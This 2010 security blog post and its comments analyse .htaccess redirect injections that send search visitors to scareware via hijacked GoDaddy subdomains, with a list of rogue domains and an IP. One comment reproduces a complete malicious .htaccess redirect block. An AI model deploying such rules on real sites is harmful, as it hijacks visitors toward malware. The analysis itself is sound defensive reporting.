msgbartop
Unmask Parasites - Check your web pages for hidden links, iframes, malicious scripts, unauthorized redirects and other signs of security problems.
msgbarbottom
Loading site search ...

Malware on Hijacked Subdomains. New Trend?

   22 May 10   Filed in Website exploits

Yesterday, Patrick (aka Noxwizard, phpBB support team member) pointed me at the new malware attack that surfaced this week (first mentioned on May 16th).

The attack creates/modifies .htaccess files to redirect site visitors that come from major search engines and popular websites (e.g. Twitter, Facebook, Wikipedia, Flickr, Ebay, etc) to scareware sites that aggressively push fake anti-virus software. The redirects also occur if visitors request unexisting pages or pages that produce server errors.

This .htaccess conditional redirect approach is nothing new. It has been actively exploited by hackers for at least couple of years (and Unmask Parasites does a good job of detecting such redirects). And while the .htaccess code in this particular case has some new features (maybe more about it next time), it isn’t the most interesting thing about this attack.

Suspicious subdomains

Thanks to the Google search suggested by Patrick (“main.php?e=4&h”) I was able to analyze the .htaccess code from multiple compromised sites. They all redirected to different scareware sites, but all those sites had similarly strange subdomains: www2, dns, ns1, ns2.

Here’s a list of 12 such sites that I found:

  • www2.smoothsouthernsoulandblues .com
  • dns.thesoulfoodcafe .com
  • ns2.landmarkengineering .net
  • ns2.lighthouseusa .net
  • ns1.ptrtool .com
  • ns2.doballoons .com
  • ns1.vimoka .net
  • ns2.vimoksha .org
  • www2.shopezlive .com
  • ns1.asmartmovehi .com
  • ns1.chestermoon .com
  • ns2.moonlightingelectric .com
  • ns.southernsoulnetwork .com (added on May 23, 2010)
  • ns2.sxm22 .com (added on May 24, 2010)
  • my.layouts2go .comĀ  at 95.211.131.185 (added on May 24, 2010)
  • ww.vailconstruction.net at 95.211.131.185 (added on May 27, 2010)
  • www2.dsc-show .com (added on June 1, 2010)
  • wwww.natebennettfleming .com (added on June 1, 2010)
  • wwww.artsrental .in (added on June 22, 2010)
  • wwww.causeof .org (added on June 22, 2010)
  • ns2.tiredwolfhome .com (added on June 22, 2010)
  • wiki.nahorodny .com (added on July 9, 2010)
  • wwww.artrentals .in (added on July 14, 2010)
  • top.reliablebanner.com (added on July 22, 2010)
  • wiki.electnate.com (added on July 22, 2010)
  • wwww.artrent .in (added on August 1, 2010)
  • wwww.insurancestrategiesblog .com (added on August 1, 2010)
  • ns1.buckcreekcamp .org (added on August 5, 2010)
  • ns2.wowrobinearl .com (added on August 10, 2010)
  • (blog | secure).drugfreecard .info (added on August 10, 2010)
  • store.mywowtv .org (added on August 16, 2010)
  • (ns2 | wwww).wheelerairservice.com (added on August 16, 2010)
  • (ns1 | blog | secure).phonesforwow.com (added on August 16, 2010)
  • wwww.freighthousesquare.com (added on August 16, 2010)

This is definitely just a tip of an iceberg (something that has been posted by webmasters who care to share information about their problems during the last week) and there may be much more such sites.

All these subdomains point to the same IP: 195 .2 .253 .42 (Madet Ltd, Russia). At the same time the main (second level) domains point to absolutely different IPs. Some of them are legitimate websites and some are just parked domains.

DNS lookup: rogue A records

The dig command shows that those subdomains are configured as A records in domains’ DNS settings.

For example, let’s take the parked lighthouseusa.net domain. It’s A record point to GoDaddy’s parking service:

lighthouseusa.net. 3600 IN A 68.178.232.100

but if you dig the ns2.lighthouseusa .net subdomain, you’ll see another A record:

ns2.lighthouseusa.net. 1800 IN A 195.2.253.42

This means that hackers have access to and can modify DNS records of those second level domains.

Stolen GoDaddy accounts

Apparently, all those second level domains are registered via GoDaddy and use GoDaddy’s name servers.

They belong to different people, but some of them have the same owner (e.g smoothsouthernsoulandblues.com and thesoulfoodcafe.com, or vimoka.net and vimoksha.org). This makes me think that hackers used stolen credentials from GoDaddy accounts.

Phishing or malware?

Most likely the credentials theft was a result of a phishing attack. If you google for GoDaddy phishing you will see a lot of messages about emails “from GoDaddy” that ask you to change/update some records and point to phishing pages that look exactly like GoDaddy.com.

Alternatively, hackers could use malware (keyloggers or browser add-ons) that steal credentials when people log into their GoDaddy accounts from infected computers.

Is it a trend?

It is clear that hackers have figured out that subdomains of legitimate websites is an almost infinite source of free domain names for their attack sites. With access to DNS settings, they can create arbitrary sub-domains that point to their own servers. Such subdomains can hardly be noticed by domain owners who rarely check their DNS records after the initial domain configuration. And they cost nothing to hackers.

I wonder if using hijacked subdomains of legitimate websites is a new trend in malware distribution or just a temporarily solution that won’t be widely adopted by cybercriminals in the long run(like dynamic DNS domains last September).

To domain owners

At this point, domain owners should be aware of this problem and be serious about protecting their account credentials.

Don’t trust emails that ask you to change/confirm account information. Always double check that they are genuine and lead to genuine websites. Also make sure that your computers are malware free.

To be on the safe side, check DNS settings of your domains for rogue records and change your account password.

Have your say

What do you think about serving malware from hijacked subdomains of legitimated websites? Is this approach viable? Do you know any other attacks that involve hacked DNS records? Maybe you have details about this particular attack?

Your comments are welcome.

Related posts:

Reader's Comments (28)

  1. |

    There has definately been a shift on doing something a little more ‘valueable’ with hacked websites. The fake drug scams have had a lot of law enforcement action. Following the main money trails, there’s not as much demand for the hacked websites to serve drugs. It’s much easier to serve malware from a domain with a previously known good domain. Koobface adapted to that as well.

  2. |

    Or you can stop using hosting providers and running your own DNS. Fail.

  3. |

    Whenever I access my own website www .galgiani .com / AVG throws out a detection warning – Explot Rogue MCOS (type 1041) — I believe related to this to this issue – ( has a www2 .shopezlive .com tagging )- how can I get rid of whatever needs ridding ? thanks

    • |

      Did you find the .htaccess file with malicious rewrite rules?

    • |

      Did anyone ever answer your question? How do you fix it? It seems everyone gets destracted before providing an answer. Were you able to fix it?

      • |

        The fix is obvious:
        1. Remove malware from your computer
        2. Change all site passwords (hackers use stolen FTP credentials)
        3. Remove the malcious redirect rules from .htaccess

        • |

          The answer may seem obvious but it aint necessarily so. What if your WordPress site has been infected by an SQL injection attack which has compromised the database and your tables and files have base64 encoded scripting inserted into them. Those three steps won’t help much…

          • |

            It’s good that you consider alternatives, however in this particular case we are not talking about WordPress (all types of sites are getting infected), and we have confirmed infection vector (via FTP).

  4. |

    [...] redirects also occur if visitors request unexisting pages or pages that produce server errors. Malware on Hijacked Subdomains. New Trend? | Unmask Parasites. Blog. [...]

  5. |

    Wow. You folks are smarter than GoDaddy. But, then, that’s not all that hard. Still, we appreciate your contribution to this issue.

  6. |

    I saw this one today as well. The .htaccess is very similar to this one:

    http://blog.sucuri.net/2010/04/conditional-redirects-or-htaccess.html

    But in this case the domain was not at godaddy..

    • |

      David, do you mean the domain of the hacked site or the domain with a rogue subdomain where the hacked site redirect traffic?

  7. |

    Interesting stuff!

    But aren’t we talking about two different things here?

    1. Hijacking via .htaccess rewrites. The victim has to arrive via one of the given domains (e g search engines) in the rewrite rules. This attack will take over the regular search hits but most likely be noticed in the statistics.

    2. Hijacking via spurious DNS records pointing a previously unused subdomain to the malware site. The victim has to arrive directly on the hijacked subdomain. This attack can go on for years without notice.

    Or are .htaccess files used in combination with the malicious DNS records?

    • |

      In this case .htaccess redirect attack uses rogue subdomains of third party sites as a destination of the redirects.

      So hacked DNS records (result of one attack) are used to create infrastructure for another attack (malicious redirects)

  8. |

    I got the following htaccess re-written on my site …. this was after they hijacked the site :

    ErrorDocument 500 hxxp://dns.thesoulfoodcafe .com/main.php?i=Jcysg9UUrPKlgRj7V8NPyZIXpA==&e=0
    ErrorDocument 502 hxxp://dns.thesoulfoodcafe .com/main.php?i=Jcysg9UUrPKlgRj7V8NPyZIXpA==&e=2
    ErrorDocument 403 hxxp://dns.thesoulfoodcafe .com/main.php?i=Jcysg9UUrPKlgRj7V8NPyZIXpA==&e=3

    RewriteEngine On

    RewriteCond %{HTTP_REFERER} .*yandex.*$ [NC,OR]
    RewriteCond %{HTTP_REFERER} .*odnoklassniki.*$ [NC,OR]
    RewriteCond %{HTTP_REFERER} .*vkontakte.*$ [NC,OR]
    RewriteCond %{HTTP_REFERER} .*rambler.*$ [NC,OR]
    RewriteCond %{HTTP_REFERER} .*tube.*$ [NC,OR]
    RewriteCond %{HTTP_REFERER} .*wikipedia.*$ [NC,OR]
    RewriteCond %{HTTP_REFERER} .*blogger.*$ [NC,OR]
    RewriteCond %{HTTP_REFERER} .*baidu.*$ [NC,OR]
    RewriteCond %{HTTP_REFERER} .*qq\.com.*$ [NC,OR]
    RewriteCond %{HTTP_REFERER} .*myspace.*$ [NC,OR]
    RewriteCond %{HTTP_REFERER} .*twitter.*$ [NC,OR]
    RewriteCond %{HTTP_REFERER} .*facebook.*$ [NC,OR]
    RewriteCond %{HTTP_REFERER} .*google.*$ [NC,OR]
    RewriteCond %{HTTP_REFERER} .*live.*$ [NC,OR]
    RewriteCond %{HTTP_REFERER} .*aol.*$ [NC,OR]
    RewriteCond %{HTTP_REFERER} .*bing.*$ [NC,OR]
    RewriteCond %{HTTP_REFERER} .*msn.*$ [NC,OR]
    RewriteCond %{HTTP_REFERER} .*amazon.*$ [NC,OR]
    RewriteCond %{HTTP_REFERER} .*ebay.*$ [NC,OR]
    RewriteCond %{HTTP_REFERER} .*linkedin.*$ [NC,OR]
    RewriteCond %{HTTP_REFERER} .*flickr.*$ [NC,OR]
    RewriteCond %{HTTP_REFERER} .*livejasmin.*$ [NC,OR]
    RewriteCond %{HTTP_REFERER} .*soso.*$ [NC,OR]
    RewriteCond %{HTTP_REFERER} .*doubleclick.*$ [NC,OR]
    RewriteCond %{HTTP_REFERER} .*pornhub.*$ [NC,OR]
    RewriteCond %{HTTP_REFERER} .*orkut.*$ [NC,OR]
    RewriteCond %{HTTP_REFERER} .*livejournal.*$ [NC,OR]
    RewriteCond %{HTTP_REFERER} .*wordpress.*$ [NC,OR]
    RewriteCond %{HTTP_REFERER} .*yahoo.*$ [NC,OR]
    RewriteCond %{HTTP_REFERER} .*ask.*$ [NC,OR]
    RewriteCond %{HTTP_REFERER} .*excite.*$ [NC,OR]
    RewriteCond %{HTTP_REFERER} .*altavista.*$ [NC,OR]
    RewriteCond %{HTTP_REFERER} .*msn.*$ [NC,OR]
    RewriteCond %{HTTP_REFERER} .*netscape.*$ [NC,OR]
    RewriteCond %{HTTP_REFERER} .*hotbot.*$ [NC,OR]
    RewriteCond %{HTTP_REFERER} .*goto.*$ [NC,OR]
    RewriteCond %{HTTP_REFERER} .*infoseek.*$ [NC,OR]
    RewriteCond %{HTTP_REFERER} .*mamma.*$ [NC,OR]
    RewriteCond %{HTTP_REFERER} .*alltheweb.*$ [NC,OR]
    RewriteCond %{HTTP_REFERER} .*lycos.*$ [NC,OR]
    RewriteCond %{HTTP_REFERER} .*search.*$ [NC,OR]
    RewriteCond %{HTTP_REFERER} .*metacrawler.*$ [NC,OR]
    RewriteCond %{HTTP_REFERER} .*mail.*$ [NC,OR]
    RewriteCond %{HTTP_REFERER} .*dogpile.*$ [NC]

    RewriteCond %{HTTP_USER_AGENT} .*Windows.*
    RewriteRule .* hxxp://dns.thesoulfoodcafe .com/main.php?e=r&h=%{HTTP_HOST}&i=Jcysg9UUrPKlgRj7V8NPyZIXpA== [R,L]

    RewriteCond %{REQUEST_FILENAME} !-f
    RewriteCond %{REQUEST_FILENAME} !-d
    RewriteCond %{REQUEST_FILENAME} !.*jpg$|.*gif$|.*png$
    RewriteCond %{HTTP_USER_AGENT} .*Windows.*
    RewriteRule .* hxxp://dns.thesoulfoodcafe .com/main.php?e=4&h=%{HTTP_HOST}&i=Jcysg9UUrPKlgRj7V8NPyZIXpA== [R,L]

  9. |

    I just had a friend with similar hack. htaccess was changed on may 24 but I have no idea how they did that.. any ideas?

    it redirected to ww.VAILCONSTRUCTION.NET and yes that is also a godaddy account, the hacked site is not. its a flash gallery site with just a few pages and a few php pages. maybe there is a leak in there..

  10. |

    First off, the target IP, 195.2.253.42 is still actively serving malware. Second, try this search – “main.php?e=r&h=” and you’ll see many more domains complaining.

    It’s a big problem if you block things by domain, because the redirect never drops out to the bare IP – instead, it looks to your local agent like you’ve contacted a subdomain of some site. This will cause safebrowsing all sorts of fits.

    • |

      Added – it appears that more RBN IPs are part of this. I just saw 95.211.131.185

  11. |

    Apparently a big problem with GoDaddy clients.

    I run a small hosting company and have had a few new clients due to similar problems with their previous hosting companies.

    Yes, 90% of the time these problems stem from your htaccess being hijacked and its advisable that you use stronger passwords on your websites.

    Majority of these problems are started by having passwords too weak. Use stronger passwords for a harder time cracking it. Less problems to worry about in the long run.

    Great article. Thanks for sharing this information!

  12. |

    Hmmm, I have the same problem but my website is in flash and I don’t use an .htaccess file for this site since I don’t need any rewrite rules. When I visit my site as soon as I get to the home page my antivirus goes crazy and it looks like my sie is trying to redirect to wiki.natebennettfleming.com/main.php?e=r&h= which is on the list above.

    I checked the DNS zone for this domain in my hosting panel and there isn’t an A record for any other IP other than my host’s.

    Where else can I find where this may be inserted so that I can cure my site?

    It’s not in DNS zone as an A-record and it’s not in .htaccess, I checked every level up to the root and I don’t have any .htaccess for this site.

    Any help is appreciated.

    • |

      Dan,

      Rogue A-records don’t apply to hacked sites. They apply to the sites where your webpages redirect to. In your case, wiki.natebennettfleming .com is an A-record of natebennettfleming .com

      >I checked every level up to the root

      Did you check above the root?

  13. |

    - UPDATE –

    Ok so since I could not find the redirect rule in any .htaccess and didn’t see an A-record I decided to:

    1) Back the site up by changing the directory’s name since it was a addon domain.

    2) Create a new/blank directory with the previous name.

    3) Delete the addon domain from cPanel. This is why I created a blank directory because otherwise cPanel might have a problem deleting a site that didn’t have a directory found.

    4) I readded the addon domain.

    5) I deleted the directory that was automatically created when I added the addon domain again and then renamed the old directory that I previously named something else back to the original name.

    That solved it!

    Not sure how because their wasn’t an A-Record before but if there was somewhere or somehow by doing the above I erased my DNS zone records and started fresh. I never found any thing in .htaccess in fact I don’t have an .htaccess file for this particular site so if anyone one else comes across this hopefully this will help.

    Best of luck :)

  14. |

    I have 2 websites with a 302 redirect to electnate.com

    I scanned the websites and didn’t find any inserted code. I checked the .htaccess files but they are empty even though they shouldn’t be. So I changed the file name in httpd.cong from .htaccess to .testing this way Apache would ignore any .htacess files and see what happaned. After ding this I ran the unmaskparasites tool again and it no longer found the 302 redirect for the sites but now I’m confused.

    It seems that 302 redirect rule for electnate would then have to be in one of the .htaccess files that I had Apache ignore but, the .htaccess files are empty.

    If I don’t have the .htaccess files then my websites don’t work properly and if I do have them somehow there is a hidden 302 redirect.

    Why are my .htaccess files mysteriously empty?

    I checked the entire server from root down, one directory at a time (it took hours) and there are no other .htaccess files other than the ones in public_html for each site but why are they empty and how come I can’t see the content?

    • |

      Do you mean 0 bytes by empty?

      Note, sometimes hackers add several screens of blank lines before the actual code. This way files may look empty when you open them in a text editor/viewer and don’t pay attention to the scroolbar (or there is no scrollbar in case of terminal editors like vi or nano)

  15. |

    [...] by a hijacked DNS server for a French construction company. This may be related to other reports of sub-domains being used to mask scam sites off of otherwise reputable domain names. The last four phishes I investigated have all referenced [...]

  16. |

    Isn’t this a rather old method that hackers have been doing for a while now? I have found several reputable sites that host malware because either the webmaster did not update the infrastructure such as a wordpress install, or the hacker has basically taken control of the site inserting his scripts.

    Google is now starting to weed out these sites and not list them on search results.